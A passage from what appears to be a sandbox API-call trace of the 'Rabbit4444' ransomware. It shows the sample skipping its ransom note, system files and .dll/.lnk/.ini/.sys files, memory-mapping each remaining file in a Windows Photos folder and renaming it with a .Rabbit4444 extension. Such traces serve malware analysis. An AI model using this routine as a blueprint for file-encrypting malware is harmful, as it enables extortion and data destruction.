(HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11ddb8 [0065.534] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0065.534] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11ddb8 | out: hHeap=0xe0000) returned 1 [0065.534] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0065.534] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15684497787) returned 1 [0065.534] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0065.534] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101958 | out: hHeap=0xe0000) returned 1 [0065.534] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.534] CloseHandle (hObject=0x27c) returned 1 [0065.535] CloseHandle (hObject=0x2cc) returned 1 [0065.535] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\MediaDb.v1.sqlite.Rabbit4444") returned 117 [0065.535] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\MediaDb.v1.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\localstate\\mediadb.v1.sqlite"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\MediaDb.v1.sqlite.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\localstate\\mediadb.v1.sqlite.rabbit4444"), dwFlags=0x1) returned 1 [0065.535] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b7f5dee, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3b7f5dee, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x31a54b0b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MediaDb.v1.sqlite-shm", cAlternateFileName="MEDIAD~3.SQL")) returned 1 [0065.535] lstrcmpiW (lpString1="MediaDb.v1.sqlite-shm", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.535] lstrcmpiW (lpString1="MediaDb.v1.sqlite-shm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.535] lstrcmpiW (lpString1="MediaDb.v1.sqlite-shm", lpString2="Rabbit4444.exe") returned -1 [0065.535] lstrcmpiW (lpString1="MediaDb.v1.sqlite-shm", lpString2=".") returned 1 [0065.535] lstrcmpiW (lpString1="MediaDb.v1.sqlite-shm", lpString2="..") returned 1 [0065.535] lstrcmpiW (lpString1="MediaDb.v1.sqlite-shm", lpString2="windows") returned -1 [0065.536] lstrcmpiW (lpString1="MediaDb.v1.sqlite-shm", lpString2="bootmgr") returned 1 [0065.536] lstrcmpiW (lpString1="MediaDb.v1.sqlite-shm", lpString2="pagefile.sys") returned -1 [0065.536] lstrcmpiW (lpString1="MediaDb.v1.sqlite-shm", lpString2="boot") returned 1 [0065.536] lstrcmpiW (lpString1="MediaDb.v1.sqlite-shm", lpString2="ids.txt") returned 1 [0065.536] lstrcmpiW (lpString1="MediaDb.v1.sqlite-shm", lpString2="NTUSER.DAT") returned -1 [0065.536] lstrcpyW (in: lpString1=0x130ebea, lpString2="MediaDb.v1.sqlite-shm" | out: lpString1="MediaDb.v1.sqlite-shm") returned="MediaDb.v1.sqlite-shm" [0065.536] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\MediaDb.v1.sqlite-shm", dwFileAttributes=0x0) returned 1 [0065.536] lstrlenW (lpString="MediaDb.v1.sqlite-shm") returned 21 [0065.536] lstrlenW (lpString="Rabbit4444") returned 10 [0065.536] lstrcmpiW (lpString1="sqlite-shm", lpString2="Rabbit4444") returned 1 [0065.536] lstrlenW (lpString=".dll") returned 4 [0065.536] lstrcmpiW (lpString1="-shm", lpString2=".dll") returned 1 [0065.536] lstrlenW (lpString=".lnk") returned 4 [0065.536] lstrcmpiW (lpString1="-shm", lpString2=".lnk") returned 1 [0065.536] lstrlenW (lpString=".ini") returned 4 [0065.536] lstrcmpiW (lpString1="-shm", lpString2=".ini") returned 1 [0065.536] lstrlenW (lpString=".sys") returned 4 [0065.536] lstrcmpiW (lpString1="-shm", lpString2=".sys") returned 1 [0065.536] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\MediaDb.v1.sqlite-shm" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\localstate\\mediadb.v1.sqlite-shm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0065.537] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0065.537] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15684746756) returned 1 [0065.537] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=32768) returned 1 [0065.537] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0065.537] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0065.537] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8300, lpName=0x0) returned 0x27c [0065.538] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8300) returned 0x70000 [0065.540] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11ddb8 [0065.541] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0065.541] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11ddb8 | out: hHeap=0xe0000) returned 1 [0065.541] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0065.541] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11ddb8 [0065.541] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0065.541] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11ddb8 | out: hHeap=0xe0000) returned 1 [0065.541] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0065.541] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15685172064) returned 1 [0065.541] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0065.541] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0065.541] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.542] CloseHandle (hObject=0x27c) returned 1 [0065.542] CloseHandle (hObject=0x2cc) returned 1 [0065.542] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\MediaDb.v1.sqlite-shm.Rabbit4444") returned 121 [0065.542] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\MediaDb.v1.sqlite-shm" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\localstate\\mediadb.v1.sqlite-shm"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\MediaDb.v1.sqlite-shm.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\localstate\\mediadb.v1.sqlite-shm.rabbit4444"), dwFlags=0x1) returned 1 [0065.542] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b7f4a5b, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3b7f4a5b, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x36142cad, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x153fd0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MediaDb.v1.sqlite-wal", cAlternateFileName="MEDIAD~2.SQL")) returned 1 [0065.542] lstrcmpiW (lpString1="MediaDb.v1.sqlite-wal", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.542] lstrcmpiW (lpString1="MediaDb.v1.sqlite-wal", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.542] lstrcmpiW (lpString1="MediaDb.v1.sqlite-wal", lpString2="Rabbit4444.exe") returned -1 [0065.542] lstrcmpiW (lpString1="MediaDb.v1.sqlite-wal", lpString2=".") returned 1 [0065.543] lstrcmpiW (lpString1="MediaDb.v1.sqlite-wal", lpString2="..") returned 1 [0065.543] lstrcmpiW (lpString1="MediaDb.v1.sqlite-wal", lpString2="windows") returned -1 [0065.543] lstrcmpiW (lpString1="MediaDb.v1.sqlite-wal", lpString2="bootmgr") returned 1 [0065.543] lstrcmpiW (lpString1="MediaDb.v1.sqlite-wal", lpString2="pagefile.sys") returned -1 [0065.543] lstrcmpiW (lpString1="MediaDb.v1.sqlite-wal", lpString2="boot") returned 1 [0065.543] lstrcmpiW (lpString1="MediaDb.v1.sqlite-wal", lpString2="ids.txt") returned 1 [0065.543] lstrcmpiW (lpString1="MediaDb.v1.sqlite-wal", lpString2="NTUSER.DAT") returned -1 [0065.543] lstrcpyW (in: lpString1=0x130ebea, lpString2="MediaDb.v1.sqlite-wal" | out: lpString1="MediaDb.v1.sqlite-wal") returned="MediaDb.v1.sqlite-wal" [0065.543] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\MediaDb.v1.sqlite-wal", dwFileAttributes=0x0) returned 1 [0065.543] lstrlenW (lpString="MediaDb.v1.sqlite-wal") returned 21 [0065.543] lstrlenW (lpString="Rabbit4444") returned 10 [0065.543] lstrcmpiW (lpString1="sqlite-wal", lpString2="Rabbit4444") returned 1 [0065.543] lstrlenW (lpString=".dll") returned 4 [0065.543] lstrcmpiW (lpString1="-wal", lpString2=".dll") returned 1 [0065.543] lstrlenW (lpString=".lnk") returned 4 [0065.543] lstrcmpiW (lpString1="-wal", lpString2=".lnk") returned 1 [0065.543] lstrlenW (lpString=".ini") returned 4 [0065.543] lstrcmpiW (lpString1="-wal", lpString2=".ini") returned 1 [0065.543] lstrlenW (lpString=".sys") returned 4 [0065.543] lstrcmpiW (lpString1="-wal", lpString2=".sys") returned 1 [0065.543] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\MediaDb.v1.sqlite-wal" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\localstate\\mediadb.v1.sqlite-wal"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0065.544] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0065.544] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15685447178) returned 1 [0065.544] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1392592) returned 1 [0065.544] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0065.544] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0065.544] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1542d0, lpName=0x0) returned 0x27c [0065.545] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1542d0) returned 0x2d10000 [0065.579] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11ddb8 [0065.579] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0065.579] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11ddb8 | out: hHeap=0xe0000) returned 1 [0065.579] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0065.579] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11ddb8 [0065.579] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0065.579] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11ddb8 | out: hHeap=0xe0000) returned 1 [0065.579] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0065.580] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15689027445) returned 1 [0065.580] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0065.580] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0065.580] UnmapViewOfFile (lpBaseAddress=0x2d10000) returned 1 [0065.592] CloseHandle (hObject=0x27c) returned 1 [0065.592] CloseHandle (hObject=0x2cc) returned 1 [0065.593] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\MediaDb.v1.sqlite-wal.Rabbit4444") returned 121 [0065.593] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\MediaDb.v1.sqlite-wal" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\localstate\\mediadb.v1.sqlite-wal"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\MediaDb.v1.sqlite-wal.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\localstate\\mediadb.v1.sqlite-wal.rabbit4444"), dwFlags=0x1) returned 1 [0065.593] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32922ee1, ftCreationTime.dwHighDateTime=0x1d32756, ftLastAccessTime.dwLowDateTime=0xd0ee01ba, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x32922ee1, ftLastWriteTime.dwHighDateTime=0x1d32756, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PhotosAppTile", cAlternateFileName="PHOTOS~1")) returned 1 [0065.593] lstrcmpiW (lpString1="PhotosAppTile", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.593] lstrcmpiW (lpString1="PhotosAppTile", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.593] lstrcmpiW (lpString1="PhotosAppTile", lpString2="Rabbit4444.exe") returned -1 [0065.594] lstrcmpiW (lpString1="PhotosAppTile", lpString2=".") returned 1 [0065.594] lstrcmpiW (lpString1="PhotosAppTile", lpString2="..") returned 1 [0065.594] lstrcmpiW (lpString1="PhotosAppTile", lpString2="windows") returned -1 [0065.594] lstrcmpiW (lpString1="PhotosAppTile", lpString2="bootmgr") returned 1 [0065.594] lstrcmpiW (lpString1="PhotosAppTile", lpString2="pagefile.sys") returned 1 [0065.594] lstrcmpiW (lpString1="PhotosAppTile", lpString2="boot") returned 1 [0065.594] lstrcmpiW (lpString1="PhotosAppTile", lpString2="ids.txt") returned 1 [0065.594] lstrcmpiW (lpString1="PhotosAppTile", lpString2="NTUSER.DAT") returned 1 [0065.594] lstrcpyW (in: lpString1=0x130ebea, lpString2="PhotosAppTile" | out: lpString1="PhotosAppTile") returned="PhotosAppTile" [0065.594] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122320 [0065.594] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xce) returned 0x108688 [0065.594] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122328 | out: ListHead=0xf68b0, ListEntry=0x122328) returned 0x122108 [0065.594] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29209045, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x29209045, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x36142cad, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PhotosAppTracing_BGTask.etl", cAlternateFileName="PHOTOS~1.ETL")) returned 1 [0065.594] lstrcmpiW (lpString1="PhotosAppTracing_BGTask.etl", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.594] lstrcmpiW (lpString1="PhotosAppTracing_BGTask.etl", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.594] lstrcmpiW (lpString1="PhotosAppTracing_BGTask.etl", lpString2="Rabbit4444.exe") returned -1 [0065.594] lstrcmpiW (lpString1="PhotosAppTracing_BGTask.etl", lpString2=".") returned 1 [0065.594] lstrcmpiW (lpString1="PhotosAppTracing_BGTask.etl", lpString2="..") returned 1 [0065.594] lstrcmpiW (lpString1="PhotosAppTracing_BGTask.etl", lpString2="windows") returned -1 [0065.594] lstrcmpiW (lpString1="PhotosAppTracing_BGTask.etl", lpString2="bootmgr") returned 1 [0065.594] lstrcmpiW (lpString1="PhotosAppTracing_BGTask.etl", lpString2="pagefile.sys") returned 1 [0065.594] lstrcmpiW (lpString1="PhotosAppTracing_BGTask.etl", lpString2="boot") returned 1 [0065.594] lstrcmpiW (lpString1="PhotosAppTracing_BGTask.etl", lpString2="ids.txt") returned 1 [0065.594] lstrcmpiW (lpString1="PhotosAppTracing_BGTask.etl", lpString2="NTUSER.DAT") returned 1 [0065.594] lstrcpyW (in: lpString1=0x130ebea, lpString2="PhotosAppTracing_BGTask.etl" | out: lpString1="PhotosAppTracing_BGTask.etl") returned="PhotosAppTracing_BGTask.etl" [0065.594] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTracing_BGTask.etl", dwFileAttributes=0x2000) returned 1 [0065.595] lstrlenW (lpString="PhotosAppTracing_BGTask.etl") returned 27 [0065.595] lstrlenW (lpString="Rabbit4444") returned 10 [0065.595] lstrcmpiW (lpString1="BGTask.etl", lpString2="Rabbit4444") returned -1 [0065.595] lstrlenW (lpString=".dll") returned 4 [0065.595] lstrcmpiW (lpString1=".etl", lpString2=".dll") returned 1 [0065.595] lstrlenW (lpString=".lnk") returned 4 [0065.595] lstrcmpiW (lpString1=".etl", lpString2=".lnk") returned -1 [0065.595] lstrlenW (lpString=".ini") returned 4 [0065.595] lstrcmpiW (lpString1=".etl", lpString2=".ini") returned -1 [0065.595] lstrlenW (lpString=".sys") returned 4 [0065.595] lstrcmpiW (lpString1=".etl", lpString2=".sys") returned -1 [0065.595] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTracing_BGTask.etl" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\localstate\\photosapptracing_bgtask.etl"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0065.595] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0065.595] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15690600331) returned 1 [0065.595] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=65536) returned 1 [0065.595] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0065.595] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0065.595] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10300, lpName=0x0) returned 0x27c [0065.596] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10300) returned 0x70000 [0065.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11ddb8 [0065.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0065.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11ddb8 | out: hHeap=0xe0000) returned 1 [0065.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0065.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11ddb8 [0065.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0065.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11ddb8 | out: hHeap=0xe0000) returned 1 [0065.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0065.606] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15691675993) returned 1 [0065.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0065.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0065.606] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.608] CloseHandle (hObject=0x27c) returned 1 [0065.608] CloseHandle (hObject=0x2cc) returned 1 [0065.608] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTracing_BGTask.etl.Rabbit4444") returned 127 [0065.608] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTracing_BGTask.etl" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\localstate\\photosapptracing_bgtask.etl"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTracing_BGTask.etl.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\localstate\\photosapptracing_bgtask.etl.rabbit4444"), dwFlags=0x1) returned 1 [0065.609] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fe551b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3fe551b, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xbc77712b, ftLastWriteTime.dwHighDateTime=0x1d327ce, nFileSizeHigh=0x0, nFileSizeLow=0x20000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PhotosAppTracing_BGTask.last.etl", cAlternateFileName="PHOTOS~2.ETL")) returned 1 [0065.609] lstrcmpiW (lpString1="PhotosAppTracing_BGTask.last.etl", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.609] lstrcmpiW (lpString1="PhotosAppTracing_BGTask.last.etl", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.609] lstrcmpiW (lpString1="PhotosAppTracing_BGTask.last.etl", lpString2="Rabbit4444.exe") returned -1 [0065.609] lstrcmpiW (lpString1="PhotosAppTracing_BGTask.last.etl", lpString2=".") returned 1 [0065.609] lstrcmpiW (lpString1="PhotosAppTracing_BGTask.last.etl", lpString2="..") returned 1 [0065.609] lstrcmpiW (lpString1="PhotosAppTracing_BGTask.last.etl", lpString2="windows") returned -1 [0065.609] lstrcmpiW (lpString1="PhotosAppTracing_BGTask.last.etl", lpString2="bootmgr") returned 1 [0065.609] lstrcmpiW (lpString1="PhotosAppTracing_BGTask.last.etl", lpString2="pagefile.sys") returned 1 [0065.609] lstrcmpiW (lpString1="PhotosAppTracing_BGTask.last.etl", lpString2="boot") returned 1 [0065.609] lstrcmpiW (lpString1="PhotosAppTracing_BGTask.last.etl", lpString2="ids.txt") returned 1 [0065.609] lstrcmpiW (lpString1="PhotosAppTracing_BGTask.last.etl", lpString2="NTUSER.DAT") returned 1 [0065.609] lstrcpyW (in: lpString1=0x130ebea, lpString2="PhotosAppTracing_BGTask.last.etl" | out: lpString1="PhotosAppTracing_BGTask.last.etl") returned="PhotosAppTracing_BGTask.last.etl" [0065.609] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTracing_BGTask.last.etl", dwFileAttributes=0x0) returned 1 [0065.613] lstrlenW (lpString="PhotosAppTracing_BGTask.last.etl") returned 32 [0065.613] lstrlenW (lpString="Rabbit4444") returned 10 [0065.613] lstrcmpiW (lpString1="k.last.etl", lpString2="Rabbit4444") returned -1 [0065.613] lstrlenW (lpString=".dll") returned 4 [0065.613] lstrcmpiW (lpString1=".etl", lpString2=".dll") returned 1 [0065.613] lstrlenW (lpString=".lnk") returned 4 [0065.613] lstrcmpiW (lpString1=".etl", lpString2=".lnk") returned -1 [0065.613] lstrlenW (lpString=".ini") returned 4 [0065.613] lstrcmpiW (lpString1=".etl", lpString2=".ini") returned -1 [0065.613] lstrlenW (lpString=".sys") returned 4 [0065.613] lstrcmpiW (lpString1=".etl", lpString2=".sys") returned -1 [0065.613] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppTracing_BGTask.last.etl" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\localstate\\photosapptracing_bgtask.last.etl"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0065.613] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0065.613] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: 